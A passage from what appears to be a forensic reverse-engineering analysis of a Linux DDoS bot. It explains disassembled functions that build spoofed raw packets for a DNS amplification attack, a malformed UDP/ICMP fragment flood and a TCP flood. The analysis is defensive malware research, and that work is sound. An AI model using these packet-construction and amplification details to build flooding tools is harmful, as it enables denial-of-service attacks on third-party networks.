0xfffff9a0(%ebp),%ebx 0x804934b: movb %dl,(%ebx) A byte of this remainder(should be <255 anyway) replaces the first byte of this data component, and oddly enough, the process is repeated to see the second byte also replaced: 0x8049360: movb %dl,0x1(%ebx) 0x1c(%ebp) and 0x20(%ebp) are then checked. These variables match up to be LongE and LongF. If LongE and LongF are both 0, we do another random() call with: 0x8049374: movl $0x7530,%ebx 0x804937a: idivl %ebx,%eax 0x804937c: movl %edx,%eax Resulting in %eax being some random number 0 to 0x7530. If either LongE or LongF are non-zero: 0x8049380: movl 0x1c(%ebp),%eax 0x8049383: shll $0x8,%eax 0x8049386: addw 0x20(%ebp),%ax The low-order end of %eax is filled such that LongE forms %ah. At this point, %eax is filled with either a random number up to 0x7530, or a value represented by LongE and LongF. Whatever the outcome: 0x804938a: xchgb %al,%ah The two bytes are exchanged (possibly a crude/optimised form of htons()?). Some more of the 'believed packet' is constructed: 0x804938c: movl 0xfffff9a4(%ebp),%ebx 0x8049392: movw %ax,(%ebx) 0x8049395: movl 0xfffff9a4(%ebp),%ebx 0x804939b: movw $0x3500,0x2(%ebx) 0x80493a1: movw 0xffffffdc(%ebp,%edi,4),%ax 0x80493a6: addw $0x8,%ax 0x80493aa: xchgb %al,%ah 0x80493ac: movw %ax,0x4(%ebx) The exchanged bytes are put into place at what would correspond to the UDP header's source port (definately explains the exchange). 2 bytes after this (the destination port), 0x3500 is positioned. 0x3500 corresponds to a destination port of 53(DNS). 0x4(%ebx) will correspond to the udp length, and is set to 0x8(udp header length) plus an indexed value starting at 0xffffffdc(%ebp). This starting point saw 9 values between 20 and 25 placed in and after it. 0x80493b0: movw $0x0,0x6(%ebx) 0x80493b6: cmpl $0x0,0x24(%ebp) 0x80493ba: jne 0x80493ec 0x6(%ebx) would be the udp header checksum, and is set to 0. A value corresponding to be LongG is then checked and if it is zero, some copying takes place. The actual values will be LongA, LongB, LongC, and LongD (See code at 0x8049180 to know why). They are placed into the 'packet buffer' positioned as the IP header source address. It should be noted here that if LongG was non-zero, the earlier gethostbyname() would have been called, and if successful, it would have filled in the source IP address. 0x80493ec: movl 0xfffff994(%ebp),%ebx 0x80493f2: movl (%ebx),%eax 0x80493f4: movl %eax,0x10(%esi) 0x80493f7: movb $0x45,(%esi) 0xfffff994(%ebp) was earlier set as a pointer to some indexed data. The long value from that memory location is then copied to 0x10(%esi). %esi at this point should still be set to the beginning of the 'packet buffer'. indexing 16bytes into that buffer is the destination IP address. That indexed buffer must correspond to IP addresses? [considering the index was a random 0 to 8000 this leads one to assume theres either an error, or this binary contains 8000 IP addresses!?!?] The moving of 0x45 (such an easily recognisable number!) is moved into the first byte of the 'packet buffer'. This corresponds to an IP version 4 packet, with a header length set to 5 (indicating 4*5 byte header). There is now no doubt that this buffer is indeed for packet construction. 0x80493fa: call 0x8055e38 0x80493ff: movl $0x82,%ebx 0x8049404: cltd 0x8049405: idivl %ebx,%eax 0x8049407: addb $0x78,%dl 0x804940a: movb %dl,0x8(%esi) Once again, random + mod code, this time with a +0x78. This is inserted into the IP TTL section (this explains the +0x78!). This ensures the TTL is always set between 120 and 250. Some more randomising code, modded by 255, followed by: 0x804941a: movw %dx,0x4(%esi) 0x804941e: movb $0x11,0x9(%esi) 0x8049422: movw $0x0,0x6(%esi) This corresponds to the IP header ID being a random 0-255 number. The 0x11 goes into the IP protocol position (udp!) and the 0 goes into the IP offset position. 0x8049428: movw 0xffffffdc(%ebp,%edi,4),%ax 0x804942d: addw $0x1c,%ax 0x8049431: xchgb %al,%ah 0x8049433: movw %ax,0x2(%esi) 0x8049437: movw $0x0,0xa(%esi) The 0xffffffdc(%ebp,%edi,4) indexed value should still correspond to that 9 number list (20-25). On top of the indexed number, 28 is added. This is obviously related to ip header size + udp header size. The low-order word result bytes are exchanged (effectively a htons()), and this word put into none other than the total length field of the IP header. 0 is put into the checksum field for the IP header. This is followed by a long set of mathematical instructions that operate on the packet data. No chances to the data are made until: 0x80494a9: movw %ax,0xa(%esi) Where the result of all these operations is put into the checksum field once again. It is assumed these operations are some form of inline chksum function, or the blackhat author wrote the checksum code directly into this function. (Note that the checksum has NOT been verified to be correct!) We then setup for a call: 0x80494ad: pushl $0x10 0x80494af: leal 0xfffffdd8(%ebp),%eax 0x80494b5: pushl %eax 0x80494b6: pushl $0x0 0x80494b8: movl 0xffffffdc(%ebp,%edi,4),%eax 0x80494bc: addl $0x1c,%eax 0x80494bf: pushl %eax 0x80494c0: leal 0xfffff9c8(%ebp),%eax 0x80494c6: pushl %eax 0x80494c7: movl 0xfffff9a8(%ebp),%ebx 0x80494cd: pushl %ebx 0x80494ce: call 0x8056c3c The function is unknown, but it doesnt take long to work out what it is: 0x8056c69: movl $0xb,%edx 0x8056c71: movl $0x66,%eax 0x8056c76: movl %edx,%ebx 0x8056c78: int $0x80 Matching to a socketcall for SYS_SENDTO. First parameter of 0xfffff9a8(%ebp) is indeed the socket returned by socket() (see 0x8049218). Second matches with the 'packet buffer'. The third is once again that indexed value plus 28. The fourth is 0, The fifth is a pointer to 0xfffffdd8(%ebp) which in hindsight makes sense of some earlier value assignments to form a sockaddr_in structure of AF_INET type with port = 0 and the address was earlier (curiously) set to the destination address. In construction of raw packets however, this structure shouldn't have any effect. The final parameter is merely the size of the sockaddr structure. This should send the previously constructed packet off. Analysis of this packet and its reasonings will be discussed in Network_Analysis_C. Following the sendto: 0x80494d6: cmpl $0x0,0x18(%ebp) 0x80494da: jne 0x80494e8 0x80494dc: pushl $0x12c 0x80494e1: call 0x80555b0 0x80494e6: jmp 0x8049507 The check uses the NumberA parameter to this function. If it is 0, it will call usleep(0x12c), and if not: 0x80494e8: movl 0x18(%ebp),%ebx 0x80494eb: cmpl %ebx,0xfffff99c(%ebp) 0x80494f1: jne 0x8049514 0x80494f3: pushl $0x12c 0x80494f8: call 0x80555b0 0x80494fd: movl $0x0,0xfffff99c(%ebp) 0x8049507: decl 0xfffff998(%ebp) 0xfffff99c(%ebp) was earlier set to 0. It compares it to NumberA, and if it is equal to it, it will usleep(0x12c), and set 0xfffff99c(%ebp) to 0. It also decrements the variable at 0xfffff998(%ebp) which seems to be related to the gethostbyname() section. If NumberA was not equal to 0xfffff99c(%ebp), it increments 0xfffff99c(%ebp) by 1. Now comes the interesting part: 0x804951a: addl $0x4,0xfffff994(%ebp) 0x8049521: movl 0xfffff994(%ebp),%ebx 0x8049527: cmpl $0x0,(%ebx) 0x804952a: jne 0x8049308 0xfffff994(%ebp) is used as a pointer to IP addresses, by incrementing it by 4, this moves it onto the next address. The space where the ip address is supposed to be is checked to be 0 (indicator of the end of the list one would assume). If it is not, it jumps back up to 0x8049308 and resends another packet. It repeats this until it hits that null. Upon reaching the null: 0x8049530: addl $0x32,0xfffff990(%ebp) 0x8049537: incl %edi 0x8049538: cmpl $0x8,%edi 0x804953b: jle 0x80492c4 0x8049541: jmp 0x8049250 0xfffff990(%ebp) is incremented by 50. This is the pointer to the packet data which, upon analysis of the actual indexed data, appears to start again every 50 bytes (with slight differences). %edi is the index for what appears to be the data sizes which will go up to, but not including 9. There then appears to be a jump back up to 0x8049250 which sees to the reset of all the indexes and pointers and restart the process again. It should be noted that there does not appear to be any exit condition, making one assume that this function will continue until the process is killed. Disassembly Review: A long and complex function. It consists primarily of two loops, one which appears to loop through data types which start at 0x80676bc, and another within it that loops through IP addresses which start at 0x806d22c. There appears to be timing considerations included in the code, possibly to alter the speed at which an infected machine will send packets out at. One cannot be sure how many packets per second would be sent without a live test. In reconstructing the function call: Network_Function_B(IPOctet1, IPOctet2, IPOctet3, IPOctet4, FloodSpeed, PortOctet1, PortOctet2, DNSFlag, Hostname) If DNSFlag is 0, the IPOctets are used as the source address for the outgoing packets. If it is non-zero, it will attempt to resolve Hostname. 0xfffff998(%ebp) is also utilised in such a way that it will try to re-resolve the hostname every 40000 usleep()'s (not necessarily every X packets). Function Overview: A very nasty function. It appears to be a form of 'packetting' function. The interesting thing about it is it specifies the source IP, and the destinations are all preset within the binary - at least 8000 of them!! [It turns out theres over 11,000 of them - See Appendix A] With analysing the network traffic (will be done in Network_Analysis_C), one can already see that packets are sent off to DNS servers on a dns port. The source IP and source port are both able to be set by the blackhat through his/her own communications channel. The actual attack is undoubtedly a form of amplification attack. Some easily seen 'features' of this attack: * Can attack a single victim * Attack can be done via hostname - on the attacking machine * DNS lookups are done occasionally and the IP address updated * The attack is scalable on a packets-per-second basis * Attack has no timeout * 9 different dns requests are used e) Network_Function_C [0x80499f4] - (Network) Known Usage: function(*0xfffff002(%ebp), *0xfffff003(%ebp), *0xfffff004(%ebp), *0xfffff005(%ebp), *0xfffff006(%ebp), *0xfffff007(%ebp), *0xfffff008(%ebp), *0xfffff009(%ebp), *0xfffff00a(%ebp), *0xfffff00b(%ebp), *0xfffff00c(%ebp), 0xffffbb44(%ebp)) Guesses at purpose: Possibly another sort of packetting function like Network_Function_B. Naming Conventions: Parameters will be given the following names: function(LongA, LongB, LongC, LongD, LongE, LongF, LongG, LongH, LongI, LongJ, LongK, BufferA) Disassembly: The function starts with a much smaller local stack size than the previous function: 0x80499f7: subl $0xa0,%esp This is followed by copying of the parameters to localised variables, and: 0x8049a3c: movw $0x2,0xfffffff0(%ebp) 0x8049a42: call 0x8055e38 First is a simple assignment, next is a call to what was earlier believed to be random(). 0x8049a47: movl $0xff,%ecx 0x8049a4c: cltd 0x8049a4d: idivl %ecx,%eax 0x8049a4f: movl %edx,%eax 0x8049a51: xchgb %al,%ah 0x8049a53: movw %ax,0xfffffff2(%ebp) The result goes through the now familiar MOD'ing process, is xchg()'d in what is probably a way of htons()'ing the number, and is finally stored at 0xfffffff2(%ebp). This is two bytes after the previous 2 was moved into at 0x8049a3c. We then setup for a function call: 0x8049a57: movzbl %bl,%eax 0x8049a5a: pushl %eax 0x8049a5b: movzbl 0xffffff6c(%ebp),%eax 0x8049a62: pushl %eax 0x8049a63: movzbl 0xffffff70(%ebp),%eax 0x8049a6a: pushl %eax 0x8049a6b: movzbl 0xffffff74(%ebp),%eax 0x8049a72: pushl %eax 0x8049a73: pushl $0x806768a 0x8049a78: leal 0xffffff90(%ebp),%esi 0x8049a7b: pushl %esi 0x8049a7c: call 0x804f808 (gdb) x/1s 0x806768a 0x806768a: "%d.%d.%d.%d" This function has been identified as sprintf(), so the call looks like: sprintf(0xffffff90(%ebp), "%d.%d.%d.%d", *0xffffff74(%ebp), *0xffffff70(%ebp), *0xffffff6c(%ebp), *bl) When looking back at %bl, we soon see that all these addresses are actually the local copies of the parameters, so: sprintf(0xffffff90(%ebp), "%d.%d.%d.%d", LongG, LongH, LongI, LongJ) One can immediately assume LongG-J are IP octets. Conditional: 0x8049a84: cmpl $0x0,0x30(%ebp) 0x8049a88: jne 0x8049abe 0x30(%ebp) corresponds to LongK. If LongK is 0: We setup for another call: 0x8049a8a: movzbl 0xffffff78(%ebp),%eax 0x8049a91: pushl %eax 0x8049a92: movzbl 0xffffff7c(%ebp),%eax 0x8049a99: pushl %eax 0x8049a9a: movzbl 0xffffff80(%ebp),%eax 0x8049a9e: pushl %eax 0x8049a9f: movzbl 0xffffff84(%ebp),%eax 0x8049aa3: pushl %eax 0x8049aa4: pushl $0x806768a 0x8049aa9: leal 0xffffffb0(%ebp),%ebx 0x8049aac: pushl %ebx 0x8049aad: call 0x804f808 Once again, another sprintf, similar to the first: sprintf(0xffffffb0(%ebp), "%d.%d.%d.%d", LongC, LongD, LongE, LongF) One can now assume LongC-F are also IP octets. %ebx is then pushed back onto the stack: 0x8049ab2: pushl %ebx 0x8049ab3: call 0x804ce8c 0x804ce8c is unidentified, so we analyse it and see: 0x804ce9a: call 0x804ceb4 This is the only real action in that part, however this call is also unidentified. Looking into this code, it appears to use the parameter as a pointer, and is comprised of a main loop. This main loop appears to scan through looking for 0x2e('.'). There are many checks done on the buffer including for 0x30,0x78, aka "0x". This instantly makes one look at the source code for inet_aton() which seems to closely (not precisely - at least not the version i looked at) to the disassembly. This also only explains the code at 0x804ceb4. The code at 0x804ce8c can be easily explained by looking at the code to inet_addr(). It matches precisely (to the source code i reviewed). As such the code at 0x804ce8c will now be known as inet_addr, and the code at 0x804ceb4 as inet_aton. Upon function completion the return value is stored: 0x8049ab8: movl %eax,0xfffffff4(%ebp) Regardless of LongK's earlier value, another function call is then setup and launched: 0x8049abe: pushl $0xff 0x8049ac3: pushl $0x3 0x8049ac5: pushl $0x2 0x8049ac7: call 0x8056cf4 This one is a lot easier, and has already been identified as socket(). This corresponds to: socket(AF_INET, SOCK_RAW, IPPROTO_RAW) The socket descriptor is place into the stack: 0x8049acc: movl %eax,0xffffff68(%ebp) 0x8049ad5: testl %eax,%eax 0x8049ad7: jle 0x8049d24 The code will continue if the socket() call was successful: 0x8049add: movb $0x45,0xffffffd0(%ebp) 0x8049ae1: movw $0x1c28,0xffffffd2(%ebp) 0x8049ae7: movw $0x5504,0xffffffd4(%ebp) 0x8049aed: call 0x8055e38 0x8049af2: movl $0x82,%ecx 0x8049af7: cltd 0x8049af8: idivl %ecx,%eax 0x8049afa: addb $0x78,%dl 0x8049afd: movb %dl,0xffffffd8(%ebp) Once again, the very noticable value (to all packet watchers) of 0x45 is seen which immediately raises the suspicion that another packet buffer is being constructed (like in Network_Function_B). If assuming this to be the case, 0xffffffd0(%ebp) would be the start of the IP header. In keeping with this idea, the 0x1c28 would be placed into IP header total length field. This should be htons()'d, as such the total length would be 10268 bytes. The next value is 0x5504 and is placed into the IP ID field. This corresponds to an ID of 1109. The call is to random() in the famous MOD'ing routing, this time ending in a MOD 130. An additional 0x78(120) is also added. This number is stored in the IP TTL field. This basically means a random TTL will be used between 120 and 250. 0x8049b00: pushl %esi 0x8049b01: call 0x804ce8c 0x8049b06: movl %eax,0xffffffdc(%ebp) 0x8049b09: addl $0x4,%esp 0x8049b0c: cmpl $0x0,0x30(%ebp) 0x8049b10: jne 0x8049b21 The first call is to inet_addr, and %esi is still assigned from the first sprintf() earlier. The result is placed into 0xffffffdc(%ebp) which corresponds to the source IP address. 0x30(%ebp) is matched to LongK. If it is 0: 0x8049b12: leal 0xffffffb0(%ebp),%eax 0x8049b15: pushl %eax 0x8049b16: call 0x804ce8c 0x8049b1b: movl %eax,0xffffffe0(%ebp) Once again, an inet_addr() call, using 0xffffffb0(%ebp). This address matches up with the destination buffer for the second sprintf() call earlier. The return value is placed into what would correspond to be the destination IP address. Back to non-conditional code: 0x8049b21: movw $0xfe1f,0xffffffd6(%ebp) 0x8049b27: movw $0x0,0xffffffda(%ebp) 0x8049b2d: cmpl $0x0,0x8(%ebp) 0x8049b31: je 0x8049bb0 The 0xfe1f (8190) will be placed into the IP offset position. LongA is then checked: If it is non-zero: 0x8049b33: movb $0x11,0xffffffd9(%ebp) The value of 17 is placed into the IP protocol field of the packet buffer, this makes it a UDP packet. 0x8049b48: movw %ax,0xffffffe4(%ebp) A random number is generated, MOD 255'd, and xchg'd. The result is placed into 0xffffffe4(%ebp) which would correspond to the beginning of the UDP header, the source port. 0x8049b4c: movw 0xc(%ebp),%ax 0x8049b50: xchgb %al,%ah 0x8049b52: movw %ax,0xffffffe6(%ebp) 0x8049b56: movw $0x900,0xffffffe8(%ebp) 0xc(%ebp) is LongB, and is xchg'd then placed into 0xffffffe6(%ebp). This corresponds to the UDP destination port. 0x900 is put into 0xffffffe8(%ebp), the UDP length field (9 bytes). This is followed by a whole set of mathematical code, one which when compared to the checksum code in Network_Function_B, matches. The part of importance: 0x8049ba4: movw %ax,0xffffffea(%ebp) This is where the result is placed into 0xffffffea(%ebp) which is the UDP checksum. Once again, the checksum code has not been analysed to be correct, and it may return a wrong result! 0x8049ba8: movb $0x61,0xffffffec(%ebp) 0x8049bac: jmp 0x8049c10 Finally, a value of 0x61 is placed into 0xffffffec(%ebp) which would mark the start of the UDP data. If the earlier check of LongA shows it to be 0: 0x8049bb0: movb $0x1,0xffffffd9(%ebp) 0x8049bb4: movb $0x8,0xffffffe4(%ebp) 0x8049bb8: movb $0x0,0xffffffe5(%ebp) 0x8049bbc: movw $0x0,0xffffffe6(%ebp) The IP protocol is set to 1 (ICMP). ICMP header is assumed to follow after a 20 byte IP header, in which case the ICMP type is set to 8 (ICMP_ECHO), the code is set to 0 (not used for ICMP echo), and the checksum is set to 0. This is followed by the now recognisable checksumming code ending in: 0x8049c0c: movw %ax,0xffffffe6(%ebp) Which replaces the checksum with the determined value. Ending the LongA conditionals: 0x8049c10: movl $0x1d,0xffffff64(%ebp) Some variable is set to 29. What follows is yet more checksum code, ending in: 0x8049c64: movw %ax,0xffffffda(%ebp) 0xffffffda(%ebp) corresponds to the IP checksum field. 0x8049c6a: leal 0xfffffff0(%ebp),%ecx 0x8049c6d: movl %ecx,0xffffff60(%ebp) 0xfffffff0(%ebp) was earlier set to 2 at 0x8049a3c. 0x8049c73: leal 0xffffffd0(%ebp),%edi %edi is loaded with 0xffffffd0(%ebp) which is the start of the 'packet buffer'. Comparisons are done: 0x8049c7a: cmpl $0x0,0x30(%ebp) 0x8049c7e: je 0x8049cce 0x8049c80: testl %ebx,%ebx 0x8049c82: jg 0x8049cce 0x30(%ebp) is referenced to LongK, and %ebx was set to 0 earlier (initially). If both LongK and %ebx are non-zero, we continue: 0x8049c84: movl 0x34(%ebp),%ecx 0x8049c87: pushl %ecx 0x8049c88: call 0x804bf80 0x34(%ebp) is referenced to BufferA, and 0x804bf80 is believed to be gethostbyname() code. Fairly self-explanatory. 0x8049c8d: movl %eax,%edx 0x8049c92: testl %edx,%edx 0x8049c94: jne 0x8049cac Result is checked (for failure of gethostbyname), if it failed: 0x8049c96: pushl $0x258 0x8049c9b: call 0x80556cc 0x8049ca0: movl $0x1,%esi 0x8049ca8: jmp 0x8049cce First is a reference to sleep(0x258). %esi is believed to be used as a variable at the moment, and is set to 1. A jump is in place, indicating the earlier gethostbyname() check was an if-then-else. If the function succeeded (in resolving the hostname in BufferA): 0x8049cac: pushl $0x4 0x8049cae: leal 0xffffff88(%ebp),%eax 0x8049cb1: pushl %eax 0x8049cb2: movl 0x10(%edx),%eax 0x8049cb5: movl (%eax),%eax 0x8049cb7: pushl %eax 0x8049cb8: call 0x8056480 Once again, we see the Misc_Data_Copy() function used in the same method as seen before. 4 bytes are copied from 0x10(%edx) to 0xffffff88(%ebp). %edx is a returned pointer to a hostent structure. 0x10(%edx) would be the first resolved IP address of the hostname. Effectively the 4 bytes of this IP address are copied into 0xffffff88(%ebp). Continuing: 0x8049cbd: movl 0xffffff88(%ebp),%eax 0x8049cc0: movl %eax,0xffffffe0(%ebp) 0x8049cc3: movl %eax,0xfffffff4(%ebp) 0x8049cc6: movl $0x9c40,%ebx 0x8049cce: testl %esi,%esi 0x8049cd0: jne 0x8049d1d 0xffffff88(%ebp) will now be copied into 0xffffffe0(%ebp) which is the destination IP address in the packet buffer. 0xfffffff4(%ebp) is unknown. %ebx was used earlier to determine if gethostbyname() should even be called. It is used identical to Network_Function_B as a way of having gethostbyname() called after every X seconds(/minutes/hours). %esi is used to keep track of gethostbyname failures. If gethostbyname isn't even called, it should be 0. If it is called and is successful, it should be 0, but if it was called and failed, it was set to 1 (see 0x8049ca0). As such, if either it was not called, or it was called and succeeded: 0x8049cd2: pushl $0x10 0x8049cd4: movl 0xffffff60(%ebp),%ecx 0x8049cda: pushl %ecx 0x8049cdb: pushl $0x0 0x8049cdd: movl 0xffffff64(%ebp),%ecx 0x8049ce3: pushl %ecx 0x8049ce4: pushl %edi 0x8049ce5: movl 0xffffff68(%ebp),%ecx 0x8049ceb: pushl %ecx 0x8049cec: call 0x8056c3c A quick look to see what %edi was: 0x8049c73: leal 0xffffffd0(%ebp),%edi And the sendto() call looks like this: sendto(*0xffffff68(%ebp), 0xffffffd0(%ebp), *0xffffff64(%ebp),0 *0xffffff60(%ebp), 0x10) Looking at what each of these are, *0xffffff68(%ebp) should still be the socket descriptor set at 0x8049acc. 0xffffffd0(%ebp) is the now well known packet buffer for this function. *0xffffff64(%ebp) was earlier set to 0x1d and is believed not to change. 0xffffff60(%ebp) is a sockaddr structure, which when looking back has been set up with values for family=AF_INET, port=random, and address=destination ip. The sendto call is then set up and repeated again. After this: 0x8049d13: pushl $0x14 0x8049d15: call 0x80555b0 Believed to be a usleep(20). This is followed by: 0x8049d1d: decl %ebx 0x8049d1e: jmp 0x8049c78 Just a reminder, that %ebx acts as a count-down. When it reaches 0, the process will gethostbyname() the string in BufferA and reset %ebx to 40000. The process then jumps back up to 0x8049c78, in what looks to be a process of simply checking the hostname, update IP (if it is time), and continue sending packets! Disassembly Review: Network_Function_C is a lot more simple than Network_Function_B. It appears to simply use the parameters to generate a packet buffer, and forms a loop to continuously send packets. A solitary usleep(20) for every 2 packets sent should rate limit the output to a constant. LongA seems to be used to identify a icmp or udp packet (0 = ICMP, anything else = UDP). LongB is used to set the packet destination port (UDP only). LongC-F are used as the destination IP octets, and LongG-J are used as the source octets. LongK is used to identify whether the process should use the LongC-F octets, or if it should use an expected hostname in BufferA. Function Overview: A strange function, with strange packet production - analysis of which will be left for Network_Analysis_D. The outcome of this function will be a flood of 29 byte udp or icmp packets. Very small, however the packet header contains an IP offset of 8190, along with an IP size field of 10268 bytes. It's possible the author made 'several' mistakes when coding this function, but given the good-coding of Network_Function_B, it may all be intentional. The outcome of these packets is unknown, but will certainly be examined in Network_Analysis_D. Features of this attack: * Single victim * Victim may be hostname-based * Hostname can be re-looked up every 80000 packets(2.2MB)! * Packet stream should be constant(except during dns lookups) * Content can be UDP or ICMP * Packets should be errors. f) Network_Function_D [0x8049d40] - (Network) Known Usage: function(*0xfffff002(%ebp), *0xfffff003(%ebp), *0xfffff004(%ebp), *0xfffff005(%ebp), *0xfffff006(%ebp), *0xfffff007(%ebp), *0xfffff008(%ebp), *0xfffff009(%ebp), *0xfffff00a(%ebp), *0xfffff00b(%ebp), *0xfffff00c(%ebp), *0xfffff00d(%ebp), *0xfffff00e(%ebp), 0xffffbb44(%ebp)) Guesses at purpose: Possibly another packetting function like network functions B and C Naming Conventions: Parameters will be given the following names: function(LongA, LongB, LongC, LongD, LongE, LongF, LongG, LongH, LongI, LongJ, LongK, LongL, LongM, BufferA) Disassembly: This function starts off just like the previous, with copying of function parameters into local variables. One of the first things of interest to occur: 0x8049d94: cmpl $0x0,0x34(%ebp) 0x8049d98: je 0x8049d9d 0x8049d9a: decl 0x34(%ebp) 0x34(%ebp) is LongL. If it is non-zero, it is decremented. This is followed by: 0x8049d9d: pushl $0x0 0x8049d9f: call 0x8057444 Which matches to a time(0) call, the result of which: 0x8049da7: pushl %eax 0x8049da8: call 0x80559a0 Is passed to an srandom() call. 0x8049db0: movw $0x2,0xfffffff0(%ebp) 0x8049db6: call 0x8055e38 2 is put into a variable, and is followed by a call to random(). The result goes through the now expected MOD routine, this time by 255, and the outcome chg()'d then placed into 0xfffffff2(%ebp). 0x8049dcb: cmpl $0x0,0x38(%ebp) 0x8049dcf: jne 0x8049e0b 0x38(%ebp) matches up with LongM. If LongM is 0: 0x8049dd1: movzbl 0xffffff38(%ebp),%eax 0x8049dd8: pushl %eax 0x8049dd9: movzbl 0xffffff54(%ebp),%eax 0x8049de0: pushl %eax 0x8049de1: movzbl 0xffffff58(%ebp),%eax 0x8049de8: pushl %eax 0x8049de9: movzbl 0xffffff5c(%ebp),%eax 0x8049df0: pushl %eax 0x8049df1: pushl $0x806768a 0x8049df6: leal 0xffffff88(%ebp),%ebx 0x8049df9: pushl %ebx 0x8049dfa: call 0x804f808 This is an sprintf call, and one that has been seen before. The pushl's all correspond to the localised versions of the function parameters. It effectively attempts to form a dotted quad address at 0xffffff88(%ebp) using LongA, LongB, LongC, and LongD as the octets. With this: 0x8049dff: pushl %ebx 0x8049e00: call 0x804ce8c 0x8049e05: movl %eax,0xfffffff4(%ebp) inet_addr() is called and the result placed into 0xfffffff4(%ebp). 0x8049e0b: movb $0x45,0xffffffc8(%ebp) 0x8049e0f: movw $0x2800,0xffffffca(%ebp) 0x8049e15: movb $0x0,0xffffffc9(%ebp) Once again, the well-known 0x45. Assuming this corresponds to the ihl and version of an IP header, the packet buffer would start at 0xffffffc8(%ebp). As such, 0xffffffca(%ebp) should be the length field of the IP header (in network byte order). 0xffffffc9(%ebp) would be the TOS field. A function is setup and called: 0x8049e19: pushl $0xff 0x8049e1e: pushl $0x3 0x8049e20: pushl $0x2 0x8049e22: call 0x8056cf4 A simple socket() call, no different to what was seen in earlier functions: socket(AF_INET, SOCK_RAW, IPPROTO_RAW) Socket descriptor is placed into a variable: 0x8049e27: movl %eax,0xffffff40(%ebp) 0x8049e30: testl %eax,%eax 0x8049e32: jle 0x804a178 And is then checked to ensure it is greater than 0. If so: 0x8049e38: cmpl $0x0,0x20(%ebp) 0x8049e3c: je 0x8049e72 0x20(%ebp) is checked. This corresponds to LongG. If it is non-zero: 0x8049e3e: movzbl 0xffffff44(%ebp),%eax 0x8049e45: pushl %eax 0x8049e46: movzbl 0xffffff48(%ebp),%eax 0x8049e4d: pushl %eax 0x8049e4e: movzbl 0xffffff4c(%ebp),%eax 0x8049e55: pushl %eax 0x8049e56: movzbl 0xffffff50(%ebp),%eax 0x8049e5d: pushl %eax 0x8049e5e: pushl $0x806768a 0x8049e63: leal 0xffffff68(%ebp),%eax 0x8049e69: pushl %eax 0x8049e6a: call 0x804f808 An sprintf is setup and called, once again to form a dotted quad using parameters passed to the function (LongH,LongI,LongJ,LongK). 0x8049e72: cmpl $0x0,0x38(%ebp) 0x8049e76: jne 0x8049e87 LongM is checked, and if it is non-zero: 0x8049e78: leal 0xffffff88(%ebp),%eax 0x8049e7b: pushl %eax 0x8049e7c: call 0x804ce8c 0x8049e81: movl %eax,0xffffffd8(%ebp) *0xffffff88(%ebp) is passed to inet_addr(). This was set up earlier in an sprintf(the first one) to be a dotted quad of LongA-D. The result of the inet_addr() is placed into 0xffffffd8(%ebp), which should correspond to a destination IP of the packet buffer that appears to be under construction. Some more packet buffer setup: 0x8049e87: movw $0x0,0xffffffce(%ebp) 0x8049e8d: movb $0x6,0xffffffd1(%ebp) The 0 is placed into the IP offset field. The 6 is placed into the IP protocol field, indicating a TCP packet. Assuming a 20 byte IP header as indicated by the ihl, the TCP packet buffer should start at 0xffffffdb(%ebp). 0x8049e91: movb 0xffffffe9(%ebp),%al 0x8049e94: andb $0xef,%al 0x8049e96: movb %al,0xffffffe9(%ebp) 0x8049e99: movb 0xffffffe8(%ebp),%al 0x8049e9c: andb $0xf,%al 0x8049e9e: orb $0x50,%al 0x8049ea0: movb %al,0xffffffe8(%ebp) These lines appear to do logical operations on byte values starting 0xffffffe9(%ebp) by 0xef. 0xffffffe9(%ebp) should correspond to the beginning of the TCP flags. This seems extremely strange since the values at the two bytes involved in the logical operations above do not seem to be set previously. 0x8049ea3: movl $0x0,0xffffffe4(%ebp) 0x8049eaa: andb $0x50,%al 0x8049eac: movb %al,0xffffffe8(%ebp) This results in the acknowledgement number being set to 0. %al should not be given a guaranteed value at this time so once again, the setting of 0xffffffe8(%ebp) is extremely strange. 0x8049eaf: movb $0x2,0xffffffe9(%ebp) 0xffffffe9(%ebp) earlier took part in the strange activity above, yet is now set to a constant of 2. It seems strange that a C compiler would have done the earlier code, possibly indicating a buggy compiler, or a buggy programmer with buggy asm. 0x8049eb3: movw $0x0,0xffffffee(%ebp) The 0 is placed into what looks to be the urgent data pointer in the tcp header. 0x8049eb9: movl 0x18(%ebp),%eax 0x8049ebc: shll $0x8,%eax 0x8049ebf: addw 0x1c(%ebp),%ax 0x8049ec3: xchgb %al,%ah 0x8049ec5: movw %ax,0xffffffde(%ebp) LongE and LongF seem to work together to form the tcp destination port. 0x8049ecb: movb $0x0,0xffffffb0(%ebp) 0x8049ecf: cmpl $0x0,0x38(%ebp) 0x8049ed3: jne 0x8049edb It is unclear what 0xffffffb0(%ebp) is used for at this point. 0x38(%ebp) once again, still refers to LongM. If it is 0: 0x8049ed5: movl 0xffffffd8(%ebp),%eax 0x8049ed8: movl %eax,0xffffffac(%ebp) 0xffffffd8(%ebp) contains the destination IP that was set in the packet buffer earlier. Continuing: 0x8049edb: movb $0x6,0xffffffb1(%ebp) 0x8049edf: movw $0x1400,0xffffffb2(%ebp) 0x8049ee7: leal 0xffffffa8(%ebp),%ebx 0x8049eea: movl %ebx,0xffffff3c(%ebp) 0x8049ef0: movl $0x0,0xffffff34(%ebp) 0x8049efa: cmpl $0x0,0x38(%ebp) 0x8049efe: je 0x8049f5b A lot of unknowns, until LongM is checked to be 0, if so: 0x8049f00: testl %esi,%esi 0x8049f02: jg 0x8049f5b %esi is used as a counter in this function (will be seen soon). If this counter reaches 0 (it is initially 0 too): 0x8049f04: movl 0x3c(%ebp),%ebx 0x8049f07: pushl %ebx 0x8049f08: call 0x804bf80 0x8049f0d: movl %eax,%edx 0x8049f12: testl %edx,%edx 0x8049f14: jne 0x8049f30 0x3c(%ebp) is BufferA, and is passed to the gethostbyname() function, as has been seen in previous functions. The return is then checked to ensure it didnt fail. If it did fail: 0x8049f16: pushl $0x258 0x8049f1b: call 0x80556cc 0x8049f20: movl $0x1,0xffffff34(%ebp) 0x8049f2d: jmp 0x8049f5b We sleep(600), set 0xffffff34(%ebp) to 1, and jump. If the gethostbyname is successful, Misc_Data_Copy is called to copy the first IP address for the hostname to 0xffffff64(%ebp). The same address is then copied more: 0x8049f44: movl 0xffffff64(%ebp),%eax 0x8049f4a: movl %eax,0xffffffd8(%ebp) 0x8049f4d: movl %eax,0xfffffff4(%ebp) 0x8049f50: movl %eax,0xffffffac(%ebp) 0xffffffd8(%ebp) is the packet destination address. 0xfffffff4(%ebp) is unknown, and 0xffffffac(%ebp) has just become known. 0xffffffac(%ebp) puts in another piece to solve a puzzle of the data starting at 0xffffffa8(%ebp). A lot of copies were unknown earlier but become clear when 